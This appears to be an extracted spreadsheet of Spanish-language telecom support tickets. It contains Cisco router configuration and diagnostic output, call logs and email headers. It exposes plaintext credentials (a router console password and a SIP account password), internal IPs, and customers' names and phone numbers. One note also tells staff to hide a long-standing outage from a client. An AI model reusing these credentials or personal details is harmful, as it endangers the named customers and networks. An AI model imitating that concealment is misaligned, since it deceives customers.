 SPEED AUTO
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.103.98.1
!
!
!
!
CONTROL-PLANE
!
!
!
LINE CON 0
 PASSWORD TELGUA
 LOGIN LOCAL
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#SHOW IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.103.98.26    YES MANUAL UP                    UP
GIGABITETHERNET0/1         190.149.175.217 YES MANUAL UP                    UP
LOOPBACK5                  10.212.191.167  YES MANUAL UP                    UP
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.103.98.1             0   8CFD.18A2.85BE  ARPA   GIGABITETHERNET0/0
INTERNET  10.103.98.26            -   F07F.06E1.33E0  ARPA   GIGABITETHERNET0/0
INTERNET  190.149.175.217         -   F07F.06E1.33E1  ARPA   GIGABITETHERNET0/1
INTERNET  190.149.175.218         0   403F.8C6D.B619  ARPA   GIGABITETHERNET0/1
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#SHOW LOGO
                                                      ^
% INVALID INPUT DETECTED AT '^' MARKER.
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 29 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 29 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 32 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.903: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*JUN 30 19:20:26.131: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*JUN 30 19:20:36.763: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 30 19:20:36.763: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 30 19:20:37.763: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 30 19:20:37.763: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 30 19:20:41.919: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*JUN 30 19:20:43.903: %SYS-6-STARTUP_CONFIG_IGNORED: SYSTEM STARTUP CONFIGURATION IS IGNORED BASED ON THE CONFIGURATION REGISTER SETTING.
*JUN 30 19:20:48.171: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 30 19:20:48.171: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 30 19:20:48.171: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 30 19:20:49.211: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*JUN 30 19:20:49.211: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN 30 19:20:49.211: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 30 19:20:50.759: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M6A, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED TUE 15-APR-14 03:31 BY PROD_REL_TEAM
*JUN 30 19:20:50.803: %SNMP-5-COLDSTART: SNMP AGENT ON HOST ROUTER IS UNDERGOING A COLD START
*JUN 30 19:21:12.255: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN 30 19:21:15.763: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 30 19:21:16.763: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 30 19:21:17.363: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 30 19:21:21.763: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 30 19:21:22.763: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 30 19:22:08.535: %SSH-5-ENABLED: SSH 1.99 HAS BEEN ENABLED
*JUN 30 19:23:36.331: %CRYPTO-6-AUTOGEN: GENERATED NEW 768 BIT KEY PAIR
*JUN 30 19:25:41.059: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*JUN 30 19:26:19.687: %SSH-3-NO_MATCH: NO MATCHING CIPHER FOUND: CLIENT AES128-CTR SERVER AES128-CBC,3DES-CBC,AES192-CBC,AES256-CBC
*JUN 30 19:28:01.015: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CONSOLE
*JUN 30 19:32:39.591: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY GESTIONIP ON VTY1 (10.103.98.1)
*JUN 30 19:32:46.975: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CONSOLE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
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#SHOW CLOC
*19:33:52.903 UTC THU JUN 30 2022
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#SHOW INT SUM
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#SHOW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6000        16     14000        12         0
* GIGABITETHERNET0/1            0         0         0         0      4000         3    103000         4         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#SHOW VER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CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57 UPTIME IS 13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TX1845831J
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
249840K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#   PID                   SN
-------------------------------------------------
*0        CISCO1921/K9          FTX1845831J
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2142</t>
  </si>
  <si>
    <t>F4622873</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE RUDY SOLICITANDO AVANCES, SE LE INDICA QUE ESTA AFECTADO POR UNA FALLA MASIVA
SE LE INFOMA A ALCIENTE AVANCES EN 2 A 2 HORAS CON 30 MIN
-ID 3001183728</t>
  </si>
  <si>
    <t>F4622887</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  FRANCISCO BENAVIDES 69995921 MENCIONA QUE SI PUEDE SACAR LLAMADAS INTERNAS (ENTRE EXTENSIONES) PERO NO PUEDE RECIBIR LLAMADAS DE OTROS NUMEROS
SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001112784</t>
  </si>
  <si>
    <t>F4622891</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GABRIEL 50179197 MENCIONA QUE EL INCONVENIENTE ES CON LOS MERAKIS
CLIENTE INDICA QUE AL TRATAR DE CONECTARSE APARECE UN ANUNCIO CON LA SIGUIENTE INFORMACION ( EL SERVICIO ESTA SUSPENDIDO TEMPORALMENTE )
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001122681</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GABRIEL 50179197  NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 3001735151
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 50179197 PARA SEGUIMIENTO, NO CONTESTA; LLAMAR MAÑANA EN EL TRANSCURSO DEL DÍA; SE LE PIDE APOYO VÍA CORREO; SE COPIA A ÁREA COMERCIAL, POR FAVOR SEGUIR LA SECUENCIA DEL MISMO.
ASUNTO: RE: SEGUIMIENTO A TICKET SD1139097</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GABRIEL 50179197  NO RESPONDE, SE INTENTARA LUEGO
-ID 30016822548</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GABRIEL AL 50179197  NO RESPONDE **
-ID 1001075352 - 1001076393
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GABRIEL 50179197 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001854712 - 3001854891</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GABRIEL AL 50179197 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 3001889595
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GABRIEL AL 50179197 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 3001856924 - 3001857233
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GABRIEL 50179197 NO RESPONDE SE INTENTARA LUEGO**
-ID 300|782623
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GABRIEL 50179197  NO RESPONDE, SE INTENTARA LUEGO**
-ID 3001706063
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GABRIEL 50179197  NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 3001716039
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 50179197 PARA SEGUIMIENTO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE; ADICIONAL SE LE PIDE APOYO VÍA CORREO:
ASUNTO: RE: SEGUIMIENTO A TICKET SD1139097</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GABRIEL 50179197 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001353450 - 3001353664</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE YA QUE NO SE HA TENIDO EXITO CONTACTANDOLO VIA LLAMADA-
533200001T | ADMINISTRADORA DE INMUEBLES LAS MAJADAS S.A.
YENSI SUCELY CALGUA MATEO
BUEN DIA ESTIMADO CLIENTE,
GUSTO EN SALUDARLE, CON RESPECTO AL SEGUIMIENTO DEL CASO APERTURADO HEMOS INTENTADO CONTACTAR CON SU PERSONA PARA SOLICITARLE LOS DATOS CORRESPONDIENTES PARA REALIZAR VISITA TECNICA. AGRADECERÍAMOS SU APOYO BRINDADO LA SIGUIENTE INFORMACIÓN:
UBICACIÓN
CONTACTO EN SITIO:
HORARIO DE ATENCION:
¿ES NECESARIA LA GESTIÓN DE PERMISOS? (SI LA RESPUESTA ES SI BRINDAR CORREO)
EN ESPERA DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GABRIEL 50179197 SIGUE SIN RESPONDER
-ID 3001391892</t>
  </si>
  <si>
    <t>F4622914</t>
  </si>
  <si>
    <t>EJECUTIVA DE CLIENTE REINA INDICA QUE   SE LE COMENTE AL CLIENTE QUE SE MANEJARA UNA ACTUALIZACIÓN CON SUS E1, ESTO VA SER PARA PODER LEVANTAR  EL E1 QUE LLEVA AÑOS TIRADO, NO SE LE DEBE MENCIONAR SOBRE EL E1 CAIDO AL CLIENTE.
1001126170
COLA:
NOMBRE: A: 58261421
NÚMERO: 58261421
DURACIÓN: 0:00:12
ESTADO: CONECTADA
DETALLES: 58261421
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 6/07/2022 12:37:33</t>
  </si>
  <si>
    <t>SE LLAMA A LOS CLIENTES VICTOR MORALES / EDGAR OLIVA PERO NO RESPONDEN.
3001828249
COLA:
NOMBRE: A: 59667018
NÚMERO: 59667018
DURACIÓN: 0:00:25
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 59667018
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 5/07/2022 08:15:46
3001828336
COLA:
NOMBRE: A: 41285964
NÚMERO: 41285964
DURACIÓN: 0:00:29
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 41285964
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 5/07/2022 08:15:53</t>
  </si>
  <si>
    <t>CLIENTE EDGAR OLIVA SOLICIAT SE LE CONTACTE A LAS 14 HORAS. HARA PRUEBAS CON SU SERVICIO
1001051732
COLA:
NOMBRE: A: 41285964
NÚMERO: 41285964
DURACIÓN: 0:00:01
ESTADO: MARCANDO
DETALLES: 41285964
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 6/07/2022 08:59:07</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE EDGAR OLIVA QUIEN SOLICITA QUE SE REPARE LA REDUNDANCIA PRIMERO Y DESPUES HACER LAS PRUEBAS.
3001944506
COLA:
NOMBRE: A: 41285964
NÚMERO: 41285964
DURACIÓN: 0:00:10
ESTADO: CONECTADA
DETALLES: 41285964
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 5/07/2022 14:16:34</t>
  </si>
  <si>
    <t>SE LLAMA AL C.LIENTE  VICTOR MORALES 59667018 NO RESPONDE, SE ESTARÁ CONTACTANDO EL LUNES EN HORARIO HABIL. SERVICIO YA NO PRESENTA PERDIDA DE LLAMADAS AL DESHABILITAR EL OTRO E1 QUE ESTA FUERA. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>RODOLFO ESTRADA/SUB GERENTE NOC INDICA QUE SE DARÁ SEGUIMIENTO CON INGENIERÍA CLARO HASTA EL DÍA LUNES EN EL TRANSCURSO DEL DÍA.</t>
  </si>
  <si>
    <t>PERSONAL DE INGENIERÍA CLARO NO LABORÓ HOY; RODOLFO ESTRADA/SUB GERENTE NOC INDICA QUE SE DARÁ SEGUIMIENTO CON INGENIERÍA MAÑANA EN EL TRANSCURSO DEL DÍA.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE VICTOR MORALES.
LLAMADA DESDE VIVO.
SOLICITA QUE SE LE LLAME EN 1HRS.</t>
  </si>
  <si>
    <t>F4622920</t>
  </si>
  <si>
    <t xml:space="preserve">
SE CONSULTA A PERSONAL DE MONITOREO DE BANCO AZTECA SOBRE EL ESTADO DE AGE
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN ELEKTRADATOS 10.16.195.100
  PING 10.16.195.100: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.16.195.100 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.74
DISPLAY IP ROUTING-TABLE VPN-INSTANCE ELEKTRADATOS 10.16.195.100
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : ELEKTRADATOS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.16.195.96/29  DIRECT  0    0             D   10.16.195.97    VLANIF339			</t>
  </si>
  <si>
    <t>F4622950</t>
  </si>
  <si>
    <t>SE LLAMA A IT - 9936-9323 SIN EMBARGO NO RESPONDE
--</t>
  </si>
  <si>
    <t>F4622963</t>
  </si>
  <si>
    <t>SE LLAMA A YANCI GALLO 25269100, ATIENDE OTRA PERSONA, SOLICITA SE LE MARQUE EN MEDIA HORA YA QUE YANSI NO SE ENCUENTRA Y ELLA ES LA QUE ESTÁ DANDO SEGUIMIENTO AL CASO. ID: 3001277487</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE YANCI GALLO  25269051 78606185, PERSONA QUE ATIENDE INDICAN QUE ESTÁN ALMORZANDO, SOLICITA SE LES LLAME DESPUÉS DE LAS 13:00 HORAS. 3001140243, 3001140461</t>
  </si>
  <si>
    <t>SE LOCALIZA A LA SEÑORITA YANCI GALLO AL 25269051, CLIENTE COMENTA QUE LOS INCONVENIENTES LLEVAN 2 DIAS SIN PRESENTARSE. SE CORRE PRUEBA DE CALIDAD EN MSAN Y NO SE OBSERVA INCREMENTO DE ERRORES. CLIENTE AUTORIZA QUE SE CIERRE EL CASO.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050325269051
NÚMERO: 0050325269051
INICIO: HOY, 09:58 A. M.
FIN: HOY, 10:01 A. M.
DURACIÓN: 2:51
ID DE LLAMADA: 3001295440</t>
  </si>
  <si>
    <t>F4622999</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 16:47
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; VICTOR CHOJOLAN &lt;VICTOR.CHOJOLAN@SARLATAM.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GUSTAVO ADOLFO GUERRA MORAN &lt;GUSTAVO.GUERRA@CLARO.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; WILLIAM PERUSSINA &lt;WILLIAM.PERUSSINA@IUNGO.CO&gt;; JAVIER SANCHEZ &lt;JAVIER.SANCHEZ@IUNGO.CO&gt;; JOSUÉ GABRIEL &lt;JOSUE.GABRIEL@IUNGO.CO&gt;; HERBERT LOPEZ &lt;HERBERT.LOPEZ@SARLATAM.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SOPORTE REMOTO &lt;SOPORTE.REMOTO@SARLATAM.COM&gt;
ASUNTO: RE: ENLACE SANTA LUCIA (56)
*-*-*-*</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DEL PERSONAL TÉCNICO QUIEN INDICA QUE NO LE PERMITEN INGRESO AL CENTRO COMERCIAL, AL INGRESO LOS DE SEGURIDAD NO LE PERMITIERON SEGUIR
SE LLAMA A CONTACTO DE QUIEN REPORTA 42180940 JUAN CARLOS ORDOÑEZ PERO NO CONTESTA
SE LLAMA A CONTACTO DE PR 35748495 EDWIN FRANCISCO RAMIREZ SOLICITA QUE SE ENVIE CORREO AL SOPORTE.REMOTO@SARLATAM.COM SANTALUCIA@MCD.COM.GT Y ELLOS GESTIONARAN ACCESOS EL DIA DE HOY
3001193603
COLA:
NOMBRE: A: 42180940
NÚMERO: 42180940
DURACIÓN: 0:00:33
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42180940
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 30/06/2022 15:28:17
3001193719
COLA:
NOMBRE: A: 42180940
NÚMERO: 42180940
DURACIÓN: 0:00:36
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42180940
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 30/06/2022 15:28:57
3001194164
COLA:
NOMBRE: A: 35748495
NÚMERO: 35748495
DURACIÓN: 0:03:31
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 35748495
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 30/06/2022 15:32:49</t>
  </si>
  <si>
    <t>F4623043</t>
  </si>
  <si>
    <t>### FAVOR CERTIFICAR SERVICIO + VERIFICAR LA DIRECCION DEBIDO A QUE ES NUEVA DIRECCION GRACIAS#CUADRO SIP ENVIADO POR CORREO#
F4623043
GDN 26510440
CLIENTE:ACACCESPRO DE R.L
DIRECCIÓN: SAN  MIGUEL AVENIDA ROOSVELT SUR 104.MEDIA CUADRA ANTES DE LA PLAZA CHAPARRASTIQUE. A LA PAR DE PILI.
CONTACTO EN SIITO RAUL AGUILAR 79217101
TELEFONO DE PERSONA EN SITIO: RAUL AGUILAR 79217101
ACCESO EMPRESARIAL
NOTA: NO SE NECESITAN PERMISOS
HORARIO DE 8AM A 5:30PM
DIAGNOSTICO: SOLICITO SU AMABLE APOYO PARA CERTIFICACION DE SERVICIO, ACTUALMENTE CLIENTE REPORTA CAIDA TOTAL- SE OBSERVA ULTIMA MILLA SINCRONIZADA.
ESTADO DE LUCES LUEGO DE UN REINICIO PERMANECEN:
PER  VERDE
SINC VERDE
ALM ROJO
#### CUADRO SIP SE ENVIO VIA CORREO##
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 14:29
PARA: GUTIERREZ MIRANDA, FRANKLIN OMAR &lt;GUTIERREZ.FRANKLIN@CLARO.COM.SV&gt;; NAVAS GONZÁLEZ, JOSÉ ROBERTO &lt;NAVAS.JOSE@CLARO.COM.SV&gt;; DE PAZ BARRIENTOS, JOSE RICARDO &lt;DEPAZ.JOSE@CLARO.COM.SV&gt;; CHIQUILLO, JOSE HUMBERTO &lt;CHIQUILLO.HUMBERTO@CLARO.COM.SV&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;
ASUNTO: F4623043 ||GDN 26510440 || CLIENTE:ACACCESPRO DE R.L
F4623043
GDN 26510440
NOMBRE CLIENTE	ACACCESPRO DE R.L
CABEC.	26510440
RANGO	26510440-26510459
USERNAME	 +50326510440@IMS.CLARO.COM.SV
PASSWORD	44EII2RTS7UQ33FW6NZZ
AUTORIZATION USER NAME	 +50326510440@IMS.CLARO.COM.SV
DOMAIN	IMS.CLARO.COM.SV
PROXY	 +50326510440@IMS.CLARO.COM.SV
PROXY SBC ZACAMIL	10.165.255.23
PROXY SBC ATLANTICO	10.165.255.151
IP WAN CLIENTE	10.165.217.27
MASCARA	255.255.255.248
GATEWAY	10.165.217.25
AVI	SI</t>
  </si>
  <si>
    <t>SE LLAMA A LCIENTE RAUL AGUILAR-79217101 ##  SE APLICA RESET A EQUIPO Y EQUIPO SE OSBERVA ALARMADO- PERO SI HAY SINCRONIZACION A NIVEL DE UM
PER  VERDE
ALM ROJO
SINC VERDE</t>
  </si>
  <si>
    <t>F4623054</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE MERCEDES VENTURA 71244455 MENCIONA QUE PERSISTE EL INCONVENIENTE, CLIENTE SOLICITA SE PUEDA ENVIAR VISITA TECNICA
-ID 3001143569
NOMBRE DEL CLIENTE: PNC
UBICACIÓN:7 AVENIDA NORTE ENTRE JUAN PABLO SEGUNDO Y 5TA CALLE PONIENTE FRENTE AL PARQUE INFANTIL SAN SALVADOR, SAN SALVADOR
CONTACTO EN SITIO: INSPECTORA AMERICA DINA FUENTES - 25291411
HORARIO DE ATENCION: 24/7
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4623060</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 RESPONDEN PERO DEJAN EN ESPERA Y YA NO RETOMAN LA LLAMADA
-ID 3001155423</t>
  </si>
  <si>
    <t>F4623061</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  NELSON GONZALEZ AL 87462903 ENVIA DIRECTO A BUZON || SE INTENTARA LUEGO**
-ID 3001129812
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  NELSON GONZALEZ 87462903  INDICA QUE EL PROBLEMA ES DE UN UPS PERO QUE LO ESTARA VIENDO INTERNAMENTE Y CUALQUIER DUDA SE ESTARA COMUNICANDO **
-ID 3001152195
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  NELSON GONZALEZ 87462903  NO RESPONDE, ENVIA A BUZON
-ID 3001142464</t>
  </si>
  <si>
    <t>F4623090</t>
  </si>
  <si>
    <t>SE HABLÓ CON FRANKLIN ORELLANA/CLIENTE 44990369 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4623091</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JULIO SANCHEZ A QUIEN SE LE INDICO QUE LAS LLAMADAS SI COMPLETAN A LOS DIDS 23218401 Y 8403 PERO SOLO AL 8402 NO COMPLETAN.
CLIENTE INDICA QUE VA A DAR SEGUIMIENTO CON SU PROVEEDOR SOLICITA QUE SE LE LLAME A LAS 15:00HRS.</t>
  </si>
  <si>
    <t>F4623099</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDREA MONTENEGRO AL 42147113  SE LE BRINDA RETROALIMENTACION**
-ID 3001168919
**</t>
  </si>
  <si>
    <t>F4623107</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO DE CAJERO 5B SE REALIZA REINICIO DE EQUIPO PERO CONTINUA IGUAL. POR LO QUE SE SOLICITA ENVIAR A SUPERVISOR A VALIDAR EQUIPOS
3001371869
COLA:
NOMBRE: A: 24207210
NÚMERO: 24207210
DURACIÓN: 0:07:25
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207210
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 1/07/2022 14:13:59</t>
  </si>
  <si>
    <t>F4623134</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL, MENCIONAN QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001215594</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 59229513 - PBX: 2420 7200 EXT. 2345 NO RESPONDE || SE INTENTARA LUEGO**
-ID 3001143676 - 3001144040
**</t>
  </si>
  <si>
    <t>**LUIS GALINDO AL NUMERO 59229513 NO RESPONDE ENVIA DIRECTO A BUZON DE VOZ || SE INTENTARA LUEGO **
-ID 3001172740
